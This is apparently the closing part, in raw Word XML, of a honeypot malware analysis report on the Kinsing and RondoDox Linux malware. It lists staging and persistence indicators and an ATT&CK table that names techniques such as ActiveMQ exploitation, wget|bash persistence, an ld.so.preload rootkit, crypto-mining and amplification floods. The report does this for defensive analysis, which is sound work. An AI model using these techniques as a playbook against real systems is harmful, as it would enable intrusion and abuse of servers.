          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware binaries with 777 (rwxrwxrwx) file permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm/.ICEd-unix directory created as staging area</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">15-thread Go process with PPid=1 (adopted by init)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. 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200"/>
        <w:gridCol w:w="456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Technique ID</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Technique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Malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Evidence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T1190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Exploit Public-Facing Application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Kinsing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ActiveMQ CVE-2023-46604 exploitation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T1059.004</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Unix Shell</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Both</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Shell command execution, wget|bash persistence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T1053.003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Cron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Kinsing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Root crontab for persistence every 1 minute</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T1574.006</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Dynamic Linker Hijacking</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Kinsing</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ld.so.preload rootkit (libsystem.so)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T1036.005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Match Legitimate Name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Kinsing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kdevtmpfsi mimics kernel process name</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T1027.002</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Software Packing</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kdevtmpfsi</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UPX-packed XMRig miner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T1027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Obfuscated Files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RondoDox</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9-layer custom encryption engine</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T1070.004</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File Deletion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Kinsing</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Deleted binary from disk, runs from memory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T1014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Rootkit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Kinsing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ld.so.preload process hiding + tool killing</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T1497.001</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System Checks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RondoDox</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TracerPid anti-debugging, ELF validation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T1498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Network DoS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RondoDox</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UDP/TCP SYN/HTTP/DNS amplification floods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T1110.001</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Password Guessing</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Both</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SSH brute-force (Rondo), Redis brute (Kinsing)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T1021.004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SSH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RondoDox</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SSH propagation with credential stuffing</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T1046</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Network Scanning</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Kinsing</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Masscan (firewire) port scanning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T1496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Resource Hijacking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Kinsing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XMRig Monero cryptocurrency mining</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T1071.001</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Web Protocols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Kinsing</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HTTP/HTTPS C2 via go-resty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T1095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Non-Application Layer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RondoDox</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Raw TCP socket C2 communication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T1057</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Process Discovery</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Both</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/proc scanning for process monitoring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T1562.001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Disable Security Tools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Both</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RondoDox: competition killer (80+ names), Kinsing: goMkill</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T1105</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Ingress Tool Transfer</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Kinsing</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Downloads firewire, miner, scripts from C2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T1543.002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Systemd Service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RondoDox</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Writes to init.d/rc.local paths for boot persistence</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T1222.002</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File Permissions Mod</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RondoDox</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Sets immutable attribute via ioctl on installed files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T1499.001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OS Exhaustion Flood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RondoDox</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ICMP/UDP/TCP SYN floods with IP spoofing</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T1499.002</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Service Exhaustion Flood</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RondoDox</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DNS/NTP/SSDP amplification attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1B3A5C" w:sz="8" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">END OF REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Generated March 24, 2026 — Analysis performed using Ghidra 11.3.1 headless decompilation on compromised server prior to system wipe.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999999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">AgricultureInTech Honeypot — Malware Deep Analysis</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tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="999999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">MALWARE ANALYSIS REPORT</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="CC0000"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	CLASSIFIED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98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7A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2026-03-24T20:59:54.218Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T20:59:54.219Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>